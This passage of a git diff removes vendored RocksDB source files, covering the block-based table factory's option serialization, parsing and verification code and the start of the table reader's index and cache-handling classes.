-  snprintf(buffer, kBufferSize, "  block_restart_interval: %d\n",
-           table_options_.block_restart_interval);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  index_block_restart_interval: %d\n",
-           table_options_.index_block_restart_interval);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  filter_policy: %s\n",
-           table_options_.filter_policy == nullptr ?
-             "nullptr" : table_options_.filter_policy->Name());
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  whole_key_filtering: %d\n",
-           table_options_.whole_key_filtering);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  format_version: %d\n",
-           table_options_.format_version);
-  ret.append(buffer);
-  return ret;
-}
-
-#ifndef ROCKSDB_LITE
-namespace {
-bool SerializeSingleBlockBasedTableOption(
-    std::string* opt_string, const BlockBasedTableOptions& bbt_options,
-    const std::string& name, const std::string& delimiter) {
-  auto iter = block_based_table_type_info.find(name);
-  if (iter == block_based_table_type_info.end()) {
-    return false;
-  }
-  auto& opt_info = iter->second;
-  const char* opt_address =
-      reinterpret_cast<const char*>(&bbt_options) + opt_info.offset;
-  std::string value;
-  bool result = SerializeSingleOptionHelper(opt_address, opt_info.type, &value);
-  if (result) {
-    *opt_string = name + "=" + value + delimiter;
-  }
-  return result;
-}
-}  // namespace
-
-Status BlockBasedTableFactory::GetOptionString(
-    std::string* opt_string, const std::string& delimiter) const {
-  assert(opt_string);
-  opt_string->clear();
-  for (auto iter = block_based_table_type_info.begin();
-       iter != block_based_table_type_info.end(); ++iter) {
-    if (iter->second.verification == OptionVerificationType::kDeprecated) {
-      // If the option is no longer used in rocksdb and marked as deprecated,
-      // we skip it in the serialization.
-      continue;
-    }
-    std::string single_output;
-    bool result = SerializeSingleBlockBasedTableOption(
-        &single_output, table_options_, iter->first, delimiter);
-    assert(result);
-    if (result) {
-      opt_string->append(single_output);
-    }
-  }
-  return Status::OK();
-}
-#else
-Status BlockBasedTableFactory::GetOptionString(
-    std::string* opt_string, const std::string& delimiter) const {
-  return Status::OK();
-}
-#endif  // !ROCKSDB_LITE
-
-const BlockBasedTableOptions& BlockBasedTableFactory::table_options() const {
-  return table_options_;
-}
-
-#ifndef ROCKSDB_LITE
-namespace {
-std::string ParseBlockBasedTableOption(const std::string& name,
-                                       const std::string& org_value,
-                                       BlockBasedTableOptions* new_options,
-                                       bool input_strings_escaped = false,
-                                       bool ignore_unknown_options = false) {
-  const std::string& value =
-      input_strings_escaped ? UnescapeOptionString(org_value) : org_value;
-  if (!input_strings_escaped) {
-    // if the input string is not escaped, it means this function is
-    // invoked from SetOptions, which takes the old format.
-    if (name == "block_cache") {
-      new_options->block_cache = NewLRUCache(ParseSizeT(value));
-      return "";
-    } else if (name == "block_cache_compressed") {
-      new_options->block_cache_compressed = NewLRUCache(ParseSizeT(value));
-      return "";
-    } else if (name == "filter_policy") {
-      // Expect the following format
-      // bloomfilter:int:bool
-      const std::string kName = "bloomfilter:";
-      if (value.compare(0, kName.size(), kName) != 0) {
-        return "Invalid filter policy name";
-      }
-      size_t pos = value.find(':', kName.size());
-      if (pos == std::string::npos) {
-        return "Invalid filter policy config, missing bits_per_key";
-      }
-      int bits_per_key =
-          ParseInt(trim(value.substr(kName.size(), pos - kName.size())));
-      bool use_block_based_builder =
-          ParseBoolean("use_block_based_builder", trim(value.substr(pos + 1)));
-      new_options->filter_policy.reset(
-          NewBloomFilterPolicy(bits_per_key, use_block_based_builder));
-      return "";
-    }
-  }
-  const auto iter = block_based_table_type_info.find(name);
-  if (iter == block_based_table_type_info.end()) {
-    if (ignore_unknown_options) {
-      return "";
-    } else {
-      return "Unrecognized option";
-    }
-  }
-  const auto& opt_info = iter->second;
-  if (opt_info.verification != OptionVerificationType::kDeprecated &&
-      !ParseOptionHelper(reinterpret_cast<char*>(new_options) + opt_info.offset,
-                         opt_info.type, value)) {
-    return "Invalid value";
-  }
-  return "";
-}
-}  // namespace
-
-Status GetBlockBasedTableOptionsFromString(
-    const BlockBasedTableOptions& table_options, const std::string& opts_str,
-    BlockBasedTableOptions* new_table_options) {
-  std::unordered_map<std::string, std::string> opts_map;
-  Status s = StringToMap(opts_str, &opts_map);
-  if (!s.ok()) {
-    return s;
-  }
-
-  return GetBlockBasedTableOptionsFromMap(table_options, opts_map,
-                                          new_table_options);
-}
-
-Status GetBlockBasedTableOptionsFromMap(
-    const BlockBasedTableOptions& table_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    BlockBasedTableOptions* new_table_options, bool input_strings_escaped,
-    bool ignore_unknown_options) {
-  assert(new_table_options);
-  *new_table_options = table_options;
-  for (const auto& o : opts_map) {
-    auto error_message = ParseBlockBasedTableOption(
-        o.first, o.second, new_table_options, input_strings_escaped,
-        ignore_unknown_options);
-    if (error_message != "") {
-      const auto iter = block_based_table_type_info.find(o.first);
-      if (iter == block_based_table_type_info.end() ||
-          !input_strings_escaped ||  // !input_strings_escaped indicates
-                                     // the old API, where everything is
-                                     // parsable.
-          (iter->second.verification != OptionVerificationType::kByName &&
-           iter->second.verification !=
-               OptionVerificationType::kByNameAllowNull &&
-           iter->second.verification != OptionVerificationType::kDeprecated)) {
-        // Restore "new_options" to the default "base_options".
-        *new_table_options = table_options;
-        return Status::InvalidArgument("Can't parse BlockBasedTableOptions:",
-                                       o.first + " " + error_message);
-      }
-    }
-  }
-  return Status::OK();
-}
-
-Status VerifyBlockBasedTableFactory(
-    const BlockBasedTableFactory* base_tf,
-    const BlockBasedTableFactory* file_tf,
-    OptionsSanityCheckLevel sanity_check_level) {
-  if ((base_tf != nullptr) != (file_tf != nullptr) &&
-      sanity_check_level > kSanityLevelNone) {
-    return Status::Corruption(
-        "[RocksDBOptionsParser]: Inconsistent TableFactory class type");
-  }
-  if (base_tf == nullptr) {
-    return Status::OK();
-  }
-  assert(file_tf != nullptr);
-
-  const auto& base_opt = base_tf->table_options();
-  const auto& file_opt = file_tf->table_options();
-
-  for (auto& pair : block_based_table_type_info) {
-    if (pair.second.verification == OptionVerificationType::kDeprecated) {
-      // We skip checking deprecated variables as they might
-      // contain random values since they might not be initialized
-      continue;
-    }
-    if (BBTOptionSanityCheckLevel(pair.first) <= sanity_check_level) {
-      if (!AreEqualOptions(reinterpret_cast<const char*>(&base_opt),
-                           reinterpret_cast<const char*>(&file_opt),
-                           pair.second, pair.first, nullptr)) {
-        return Status::Corruption(
-            "[RocksDBOptionsParser]: "
-            "failed the verification on BlockBasedTableOptions::",
-            pair.first);
-      }
-    }
-  }
-  return Status::OK();
-}
-#endif  // !ROCKSDB_LITE
-
-TableFactory* NewBlockBasedTableFactory(
-    const BlockBasedTableOptions& _table_options) {
-  return new BlockBasedTableFactory(_table_options);
-}
-
-const std::string BlockBasedTableFactory::kName = "BlockBasedTable";
-const std::string BlockBasedTablePropertyNames::kIndexType =
-    "rocksdb.block.based.table.index.type";
-const std::string BlockBasedTablePropertyNames::kWholeKeyFiltering =
-    "rocksdb.block.based.table.whole.key.filtering";
-const std::string BlockBasedTablePropertyNames::kPrefixFiltering =
-    "rocksdb.block.based.table.prefix.filtering";
-const std::string kHashIndexPrefixesBlock = "rocksdb.hashindex.prefixes";
-const std::string kHashIndexPrefixesMetadataBlock =
-    "rocksdb.hashindex.metadata";
-const std::string kPropTrue = "1";
-const std::string kPropFalse = "0";
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_based_table_factory.h b/thirdparty/rocksdb/table/block_based_table_factory.h
deleted file mode 100644
index 39e3eac..0000000
--- a/thirdparty/rocksdb/table/block_based_table_factory.h
+++ /dev/null
@@ -1,157 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <stdint.h>
-
-#include <memory>
-#include <string>
-
-#include "db/dbformat.h"
-#include "options/options_helper.h"
-#include "options/options_parser.h"
-#include "rocksdb/flush_block_policy.h"
-#include "rocksdb/table.h"
-
-namespace rocksdb {
-
-struct EnvOptions;
-
-using std::unique_ptr;
-class BlockBasedTableBuilder;
-
-class BlockBasedTableFactory : public TableFactory {
- public:
-  explicit BlockBasedTableFactory(
-      const BlockBasedTableOptions& table_options = BlockBasedTableOptions());
-
-  ~BlockBasedTableFactory() {}
-
-  const char* Name() const override { return kName.c_str(); }
-
-  Status NewTableReader(
-      const TableReaderOptions& table_reader_options,
-      unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-      unique_ptr<TableReader>* table_reader,
-      bool prefetch_index_and_filter_in_cache = true) const override;
-
-  TableBuilder* NewTableBuilder(
-      const TableBuilderOptions& table_builder_options,
-      uint32_t column_family_id, WritableFileWriter* file) const override;
-
-  // Sanitizes the specified DB Options.
-  Status SanitizeOptions(const DBOptions& db_opts,
-                         const ColumnFamilyOptions& cf_opts) const override;
-
-  std::string GetPrintableTableOptions() const override;
-
-  Status GetOptionString(std::string* opt_string,
-                         const std::string& delimiter) const override;
-
-  const BlockBasedTableOptions& table_options() const;
-
-  void* GetOptions() override { return &table_options_; }
-
-  bool IsDeleteRangeSupported() const override { return true; }
-
-  static const std::string kName;
-
- private:
-  BlockBasedTableOptions table_options_;
-};
-
-extern const std::string kHashIndexPrefixesBlock;
-extern const std::string kHashIndexPrefixesMetadataBlock;
-extern const std::string kPropTrue;
-extern const std::string kPropFalse;
-
-#ifndef ROCKSDB_LITE
-extern Status VerifyBlockBasedTableFactory(
-    const BlockBasedTableFactory* base_tf,
-    const BlockBasedTableFactory* file_tf,
-    OptionsSanityCheckLevel sanity_check_level);
-
-static std::unordered_map<std::string, OptionTypeInfo>
-    block_based_table_type_info = {
-        /* currently not supported
-          std::shared_ptr<Cache> block_cache = nullptr;
-          std::shared_ptr<Cache> block_cache_compressed = nullptr;
-         */
-        {"flush_block_policy_factory",
-         {offsetof(struct BlockBasedTableOptions, flush_block_policy_factory),
-          OptionType::kFlushBlockPolicyFactory, OptionVerificationType::kByName,
-          false, 0}},
-        {"cache_index_and_filter_blocks",
-         {offsetof(struct BlockBasedTableOptions,
-                   cache_index_and_filter_blocks),
-          OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-        {"cache_index_and_filter_blocks_with_high_priority",
-         {offsetof(struct BlockBasedTableOptions,
-                   cache_index_and_filter_blocks_with_high_priority),
-          OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-        {"pin_l0_filter_and_index_blocks_in_cache",
-         {offsetof(struct BlockBasedTableOptions,
-                   pin_l0_filter_and_index_blocks_in_cache),
-          OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-        {"index_type",
-         {offsetof(struct BlockBasedTableOptions, index_type),
-          OptionType::kBlockBasedTableIndexType,
-          OptionVerificationType::kNormal, false, 0}},
-        {"hash_index_allow_collision",
-         {offsetof(struct BlockBasedTableOptions, hash_index_allow_collision),
-          OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-        {"checksum",
-         {offsetof(struct BlockBasedTableOptions, checksum),
-          OptionType::kChecksumType, OptionVerificationType::kNormal, false,
-          0}},
-        {"no_block_cache",
-         {offsetof(struct BlockBasedTableOptions, no_block_cache),
-          OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-        {"block_size",
-         {offsetof(struct BlockBasedTableOptions, block_size),
-          OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}},
-        {"block_size_deviation",
-         {offsetof(struct BlockBasedTableOptions, block_size_deviation),
-          OptionType::kInt, OptionVerificationType::kNormal, false, 0}},
-        {"block_restart_interval",
-         {offsetof(struct BlockBasedTableOptions, block_restart_interval),
-          OptionType::kInt, OptionVerificationType::kNormal, false, 0}},
-        {"index_block_restart_interval",
-         {offsetof(struct BlockBasedTableOptions, index_block_restart_interval),
-          OptionType::kInt, OptionVerificationType::kNormal, false, 0}},
-        {"index_per_partition",
-         {0, OptionType::kUInt64T, OptionVerificationType::kDeprecated, false,
-          0}},
-        {"metadata_block_size",
-         {offsetof(struct BlockBasedTableOptions, metadata_block_size),
-          OptionType::kUInt64T, OptionVerificationType::kNormal, false, 0}},
-        {"partition_filters",
-         {offsetof(struct BlockBasedTableOptions, partition_filters),
-          OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-        {"filter_policy",
-         {offsetof(struct BlockBasedTableOptions, filter_policy),
-          OptionType::kFilterPolicy, OptionVerificationType::kByName, false,
-          0}},
-        {"whole_key_filtering",
-         {offsetof(struct BlockBasedTableOptions, whole_key_filtering),
-          OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-        {"skip_table_builder_flush",
-         {0, OptionType::kBoolean, OptionVerificationType::kDeprecated, false,
-          0}},
-        {"format_version",
-         {offsetof(struct BlockBasedTableOptions, format_version),
-          OptionType::kUInt32T, OptionVerificationType::kNormal, false, 0}},
-        {"verify_compression",
-         {offsetof(struct BlockBasedTableOptions, verify_compression),
-          OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-        {"read_amp_bytes_per_bit",
-         {offsetof(struct BlockBasedTableOptions, read_amp_bytes_per_bit),
-          OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}}};
-#endif  // !ROCKSDB_LITE
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_based_table_reader.cc b/thirdparty/rocksdb/table/block_based_table_reader.cc
deleted file mode 100644
index d8c6d80..0000000
--- a/thirdparty/rocksdb/table/block_based_table_reader.cc
+++ /dev/null
@@ -1,2455 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include "table/block_based_table_reader.h"
-
-#include <algorithm>
-#include <limits>
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "db/dbformat.h"
-#include "db/pinned_iterators_manager.h"
-
-#include "rocksdb/cache.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/options.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/table.h"
-#include "rocksdb/table_properties.h"
-
-#include "table/block.h"
-#include "table/block_based_filter_block.h"
-#include "table/block_based_table_factory.h"
-#include "table/block_prefix_index.h"
-#include "table/filter_block.h"
-#include "table/format.h"
-#include "table/full_filter_block.h"
-#include "table/get_context.h"
-#include "table/internal_iterator.h"
-#include "table/meta_blocks.h"
-#include "table/partitioned_filter_block.h"
-#include "table/persistent_cache_helper.h"
-#include "table/sst_file_writer_collectors.h"
-#include "table/two_level_iterator.h"
-
-#include "monitoring/perf_context_imp.h"
-#include "util/coding.h"
-#include "util/file_reader_writer.h"
-#include "util/stop_watch.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-extern const uint64_t kBlockBasedTableMagicNumber;
-extern const std::string kHashIndexPrefixesBlock;
-extern const std::string kHashIndexPrefixesMetadataBlock;
-using std::unique_ptr;
-
-typedef BlockBasedTable::IndexReader IndexReader;
-
-BlockBasedTable::~BlockBasedTable() {
-  Close();
-  delete rep_;
-}
-
-namespace {
-// Read the block identified by "handle" from "file".
-// The only relevant option is options.verify_checksums for now.
-// On failure return non-OK.
-// On success fill *result and return OK - caller owns *result
-// @param compression_dict Data for presetting the compression library's
-//    dictionary.
-Status ReadBlockFromFile(
-    RandomAccessFileReader* file, FilePrefetchBuffer* prefetch_buffer,
-    const Footer& footer, const ReadOptions& options, const BlockHandle& handle,
-    std::unique_ptr<Block>* result, const ImmutableCFOptions& ioptions,
-    bool do_uncompress, const Slice& compression_dict,
-    const PersistentCacheOptions& cache_options, SequenceNumber global_seqno,
-    size_t read_amp_bytes_per_bit) {
-  BlockContents contents;
-  Status s = ReadBlockContents(file, prefetch_buffer, footer, options, handle,
-                               &contents, ioptions, do_uncompress,
-                               compression_dict, cache_options);
-  if (s.ok()) {
-    result->reset(new Block(std::move(contents), global_seqno,
-                            read_amp_bytes_per_bit, ioptions.statistics));
-  }
-
-  return s;
-}
-
-// Delete the resource that is held by the iterator.
-template <class ResourceType>
-void DeleteHeldResource(void* arg, void* ignored) {
-  delete reinterpret_cast<ResourceType*>(arg);
-}
-
-// Delete the entry resided in the cache.
-template <class Entry>
-void DeleteCachedEntry(const Slice& key, void* value) {
-  auto entry = reinterpret_cast<Entry*>(value);
-  delete entry;
-}
-
-void DeleteCachedFilterEntry(const Slice& key, void* value);
-void DeleteCachedIndexEntry(const Slice& key, void* value);
-
-// Release the cached entry and decrement its ref count.
-void ReleaseCachedEntry(void* arg, void* h) {
-  Cache* cache = reinterpret_cast<Cache*>(arg);
-  Cache::Handle* handle = reinterpret_cast<Cache::Handle*>(h);
-  cache->Release(handle);
-}
-
-Slice GetCacheKeyFromOffset(const char* cache_key_prefix,
-                            size_t cache_key_prefix_size, uint64_t offset,
-                            char* cache_key) {
-  assert(cache_key != nullptr);
-  assert(cache_key_prefix_size != 0);
-  assert(cache_key_prefix_size <= BlockBasedTable::kMaxCacheKeyPrefixSize);
-  memcpy(cache_key, cache_key_prefix, cache_key_prefix_size);
-  char* end = EncodeVarint64(cache_key + cache_key_prefix_size, offset);
-  return Slice(cache_key, static_cast<size_t>(end - cache_key));
-}
-
-Cache::Handle* GetEntryFromCache(Cache* block_cache, const Slice& key,
-                                 Tickers block_cache_miss_ticker,
-                                 Tickers block_cache_hit_ticker,
-                                 Statistics* statistics) {
-  auto cache_handle = block_cache->Lookup(key, statistics);
-  if (cache_handle != nullptr) {
-    PERF_COUNTER_ADD(block_cache_hit_count, 1);
-    // overall cache hit
-    RecordTick(statistics, BLOCK_CACHE_HIT);
-    // total bytes read from cache
-    RecordTick(statistics, BLOCK_CACHE_BYTES_READ,
-               block_cache->GetUsage(cache_handle));
-    // block-type specific cache hit
-    RecordTick(statistics, block_cache_hit_ticker);
-  } else {
-    // overall cache miss
-    RecordTick(statistics, BLOCK_CACHE_MISS);
-    // block-type specific cache miss
-    RecordTick(statistics, block_cache_miss_ticker);
-  }
-
-  return cache_handle;
-}
-
-}  // namespace
-
-// Index that allows binary search lookup in a two-level index structure.
-class PartitionIndexReader : public IndexReader, public Cleanable {
- public:
-  // Read the partition index from the file and create an instance for
-  // `PartitionIndexReader`.
-  // On success, index_reader will be populated; otherwise it will remain
-  // unmodified.
-  static Status Create(BlockBasedTable* table, RandomAccessFileReader* file,
-                       FilePrefetchBuffer* prefetch_buffer,
-                       const Footer& footer, const BlockHandle& index_handle,
-                       const ImmutableCFOptions& ioptions,
-                       const InternalKeyComparator* icomparator,
-                       IndexReader** index_reader,
-                       const PersistentCacheOptions& cache_options,
-                       const int level) {
-    std::unique_ptr<Block> index_block;
-    auto s = ReadBlockFromFile(
-        file, prefetch_buffer, footer, ReadOptions(), index_handle,
-        &index_block, ioptions, true /* decompress */,
-        Slice() /*compression dict*/, cache_options,
-        kDisableGlobalSequenceNumber, 0 /* read_amp_bytes_per_bit */);
-
-    if (s.ok()) {
-      *index_reader =
-          new PartitionIndexReader(table, icomparator, std::move(index_block),
-                                   ioptions.statistics, level);
-    }
-
-    return s;
-  }
-
-  // return a two-level iterator: first level is on the partition index
-  virtual InternalIterator* NewIterator(BlockIter* iter = nullptr,
-                                        bool dont_care = true) override {
-    // Filters are already checked before seeking the index
-    const bool skip_filters = true;
-    const bool is_index = true;
-    return NewTwoLevelIterator(
-        new BlockBasedTable::BlockEntryIteratorState(
-            table_, ReadOptions(), icomparator_, skip_filters, is_index,
-            partition_map_.size() ? &partition_map_ : nullptr),
-        index_block_->NewIterator(icomparator_, nullptr, true));
-    // TODO(myabandeh): Update TwoLevelIterator to be able to make use of
-    // on-stack BlockIter while the state is on heap. Currentlly it assumes
-    // the first level iter is always on heap and will attempt to delete it
-    // in its destructor.
-  }
-
-  virtual void CacheDependencies(bool pin) override {
-    // Before read partitions, prefetch them to avoid lots of IOs
-    auto rep = table_->rep_;
-    BlockIter biter;
-    BlockHandle handle;
-    index_block_->NewIterator(icomparator_, &biter, true);
-    // Index partitions are assumed to be consecuitive. Prefetch them all.
-    // Read the first block offset
-    biter.SeekToFirst();
-    Slice input = biter.value();
-    Status s = handle.DecodeFrom(&input);
-    assert(s.ok());
-    if (!s.ok()) {
-      ROCKS_LOG_WARN(rep->ioptions.info_log,
-                     "Could not read first index partition");
-      return;
-    }
-    uint64_t prefetch_off = handle.offset();
-
-    // Read the last block's offset
-    biter.SeekToLast();
-    input = biter.value();
-    s = handle.DecodeFrom(&input);
-    assert(s.ok());
-    if (!s.ok()) {
-      ROCKS_LOG_WARN(rep->ioptions.info_log,
-                     "Could not read last index partition");
-      return;
-    }
-    uint64_t last_off = handle.offset() + handle.size() + kBlockTrailerSize;
-    uint64_t prefetch_len = last_off - prefetch_off;
-    std::unique_ptr<FilePrefetchBuffer> prefetch_buffer;
-    auto& file = table_->rep_->file;
-    prefetch_buffer.reset(new FilePrefetchBuffer());
-    s = prefetch_buffer->Prefetch(file.get(), prefetch_off, prefetch_len);
-
-    // After prefetch, read the partitions one by one
-    biter.SeekToFirst();
-    auto ro = ReadOptions();
-    Cache* block_cache = rep->table_options.block_cache.get();
-    for (; biter.Valid(); biter.Next()) {
-      input = biter.value();
-      s = handle.DecodeFrom(&input);
-      assert(s.ok());
-      if (!s.ok()) {
-        ROCKS_LOG_WARN(rep->ioptions.info_log,
-                       "Could not read index partition");
-        continue;
-      }
-
-      BlockBasedTable::CachableEntry<Block> block;
-      Slice compression_dict;
-      if (rep->compression_dict_block) {
-        compression_dict = rep->compression_dict_block->data;
-      }
-      const bool is_index = true;
-      s = table_->MaybeLoadDataBlockToCache(prefetch_buffer.get(), rep, ro,
-                                            handle, compression_dict, &block,
-                                            is_index);
-
-      assert(s.ok() || block.value == nullptr);
-      if (s.ok() && block.value != nullptr) {
-        assert(block.cache_handle != nullptr);
-        if (pin) {
-          partition_map_[handle.offset()] = block;
-          RegisterCleanup(&ReleaseCachedEntry, block_cache, block.cache_handle);
-        } else {
-          block_cache->Release(block.cache_handle);
-        }
-      }
-    }
-  }
-
-  virtual size_t size() const override { return index_block_->size(); }
-  virtual size_t usable_size() const override {
-    return index_block_->usable_size();
-  }
-
-  virtual size_t ApproximateMemoryUsage() const override {
-    assert(index_block_);
-    return index_block_->ApproximateMemoryUsage();
-  }
-
- private:
-  PartitionIndexReader(BlockBasedTable* table,
-                       const InternalKeyComparator* icomparator,
-                       std::unique_ptr<Block>&& index_block, Statistics* stats,
-                       const int level)
-      : IndexReader(icomparator, stats),
-        table_(table),
-        index_block_(std::move(index_block)) {
-    assert(index_block_ != nullptr);
-  }
-  BlockBasedTable* table_;
-  std::unique_ptr<Block> index_block_;
-  std::unordered_map<uint64_t, BlockBasedTable::CachableEntry<Block>>
-      partition_map_;
-};
-
-// Index that allows binary search lookup for the first key of each block.
-// This class can be viewed as a thin wrapper for `Block` class which already
-// supports binary search.
-class BinarySearchIndexReader : public IndexReader {
- public:
-  // Read index from the file and create an intance for
-  // `BinarySearchIndexReader`.
-  // On success, index_reader will be populated; otherwise it will remain
-  // unmodified.
-  static Status Create(RandomAccessFileReader* file,
-                       FilePrefetchBuffer* prefetch_buffer,
-                       const Footer& footer, const BlockHandle& index_handle,
-                       const ImmutableCFOptions& ioptions,
-                       const InternalKeyComparator* icomparator,
-                       IndexReader** index_reader,
-                       const PersistentCacheOptions& cache_options) {
-    std::unique_ptr<Block> index_block;
-    auto s = ReadBlockFromFile(
-        file, prefetch_buffer, footer, ReadOptions(), index_handle,
-        &index_block, ioptions, true /* decompress */,
-        Slice() /*compression dict*/, cache_options,
-        kDisableGlobalSequenceNumber, 0 /* read_amp_bytes_per_bit */);
-
-    if (s.ok()) {
-      *index_reader = new BinarySearchIndexReader(
-          icomparator, std::move(index_block), ioptions.statistics);
-    }
-
-    return s;
-  }
-
-  virtual InternalIterator* NewIterator(BlockIter* iter = nullptr,
-                                        bool dont_care = true) override {
-    return index_block_->NewIterator(icomparator_, iter, true);
-  }
-
-  virtual size_t size() const override { return index_block_->size(); }
-  virtual size_t usable_size() const override {
-    return index_block_->usable_size();
-  }
-
-  virtual size_t ApproximateMemoryUsage() const override {
-    assert(index_block_);
-    return index_block_->ApproximateMemoryUsage();
-  }
-
- private:
-  BinarySearchIndexReader(const InternalKeyComparator* icomparator,
-                          std::unique_ptr<Block>&& index_block,
-                          Statistics* stats)
-      : IndexReader(icomparator, stats), index_block_(std::move(index_block)) {
-    assert(index_block_ != nullptr);
-  }
-  std::unique_ptr<Block> index_block_;
-};
-
-// Index that leverages an internal hash table to quicken the lookup for a given
-// key.
-class HashIndexReader : public IndexReader {
- public:
-  static Status Create(const SliceTransform* hash_key_extractor,
-                       const Footer& footer, RandomAccessFileReader* file,
-                       FilePrefetchBuffer* prefetch_buffer,
-                       const ImmutableCFOptions& ioptions,
-                       const InternalKeyComparator* icomparator,
-                       const BlockHandle& index_handle,
-                       InternalIterator* meta_index_iter,
-                       IndexReader** index_reader,
-                       bool hash_index_allow_collision,
-                       const PersistentCacheOptions& cache_options) {
-    std::unique_ptr<Block> index_block;
-    auto s = ReadBlockFromFile(
-        file, prefetch_buffer, footer, ReadOptions(), index_handle,
-        &index_block, ioptions, true /* decompress */,
-        Slice() /*compression dict*/, cache_options,
-        kDisableGlobalSequenceNumber, 0 /* read_amp_bytes_per_bit */);
-
-    if (!s.ok()) {
-      return s;
-    }
-
-    // Note, failure to create prefix hash index does not need to be a
-    // hard error. We can still fall back to the original binary search index.
-    // So, Create will succeed regardless, from this point on.
-
-    auto new_index_reader =
-        new HashIndexReader(icomparator, std::move(index_block),
-          ioptions.statistics);
-    *index_reader = new_index_reader;
-
-    // Get prefixes block
-    BlockHandle prefixes_handle;
-    s = FindMetaBlock(meta_index_iter, kHashIndexPrefixesBlock,
-                      &prefixes_handle);
-    if (!s.ok()) {
-      // TODO: log error
-      return Status::OK();
-    }
-
-    // Get index metadata block
-    BlockHandle prefixes_meta_handle;
-    s = FindMetaBlock(meta_index_iter, kHashIndexPrefixesMetadataBlock,
-                      &prefixes_meta_handle);
-    if (!s.ok()) {
-      // TODO: log error
-      return Status::OK();
-    }
-
-    // Read contents for the blocks
-    BlockContents prefixes_contents;
-    s = ReadBlockContents(file, prefetch_buffer, footer, ReadOptions(),
-                          prefixes_handle, &prefixes_contents, ioptions,
-                          true /* decompress */, Slice() /*compression dict*/,
-                          cache_options);
-    if (!s.ok()) {
-      return s;
-    }
-    BlockContents prefixes_meta_contents;
-    s = ReadBlockContents(file, prefetch_buffer, footer, ReadOptions(),
-                          prefixes_meta_handle, &prefixes_meta_contents,
-                          ioptions, true /* decompress */,
-                          Slice() /*compression dict*/, cache_options);
-    if (!s.ok()) {
-      // TODO: log error
-      return Status::OK();
-    }
-
-    BlockPrefixIndex* prefix_index = nullptr;
-    s = BlockPrefixIndex::Create(hash_key_extractor, prefixes_contents.data,
-                                 prefixes_meta_contents.data, &prefix_index);
-    // TODO: log error
-    if (s.ok()) {
-      new_index_reader->index_block_->SetBlockPrefixIndex(prefix_index);
-    }
-
-    return Status::OK();
-  }
-
-  virtual InternalIterator* NewIterator(BlockIter* iter = nullptr,
-                                        bool total_order_seek = true) override {
-    return index_block_->NewIterator(icomparator_, iter, total_order_seek);
-  }
-
-  virtual size_t size() const override { return index_block_->size(); }
-  virtual size_t usable_size() const override {
-    return index_block_->usable_size();
-  }
-
-  virtual size_t ApproximateMemoryUsage() const override {
-    assert(index_block_);
-    return index_block_->ApproximateMemoryUsage() +
-           prefixes_contents_.data.size();
-  }
-
- private:
-  HashIndexReader(const InternalKeyComparator* icomparator,
-                  std::unique_ptr<Block>&& index_block, Statistics* stats)
-      : IndexReader(icomparator, stats), index_block_(std::move(index_block)) {
-    assert(index_block_ != nullptr);
-  }
-
-  ~HashIndexReader() {
-  }
-
-  std::unique_ptr<Block> index_block_;
-  BlockContents prefixes_contents_;
-};
-
-// Helper function to setup the cache key's prefix for the Table.
-void BlockBasedTable::SetupCacheKeyPrefix(Rep* rep, uint64_t file_size) {
-  assert(kMaxCacheKeyPrefixSize >= 10);
-  rep->cache_key_prefix_size = 0;
-  rep->compressed_cache_key_prefix_size = 0;
-  if (rep->table_options.block_cache != nullptr) {
-    GenerateCachePrefix(rep->table_options.block_cache.get(), rep->file->file(),
-                        &rep->cache_key_prefix[0], &rep->cache_key_prefix_size);
-    // Create dummy offset of index reader which is beyond the file size.
-    rep->dummy_index_reader_offset =
-        file_size + rep->table_options.block_cache->NewId();
-  }
-  if (rep->table_options.persistent_cache != nullptr) {
-    GenerateCachePrefix(/*cache=*/nullptr, rep->file->file(),
-                        &rep->persistent_cache_key_prefix[0],
-                        &rep->persistent_cache_key_prefix_size);
-  }
-  if (rep->table_options.block_cache_compressed != nullptr) {
-    GenerateCachePrefix(rep->table_options.block_cache_compressed.get(),
-                        rep->file->file(), &rep->compressed_cache_key_prefix[0],
-                        &rep->compressed_cache_key_prefix_size);
-  }
-}
-
-void BlockBasedTable::GenerateCachePrefix(Cache* cc,
-    RandomAccessFile* file, char* buffer, size_t* size) {
-
-  // generate an id from the file
-  *size = file->GetUniqueId(buffer, kMaxCacheKeyPrefixSize);
-
-  // If the prefix wasn't generated or was too long,
-  // create one from the cache.
-  if (cc && *size == 0) {
-    char* end = EncodeVarint64(buffer, cc->NewId());
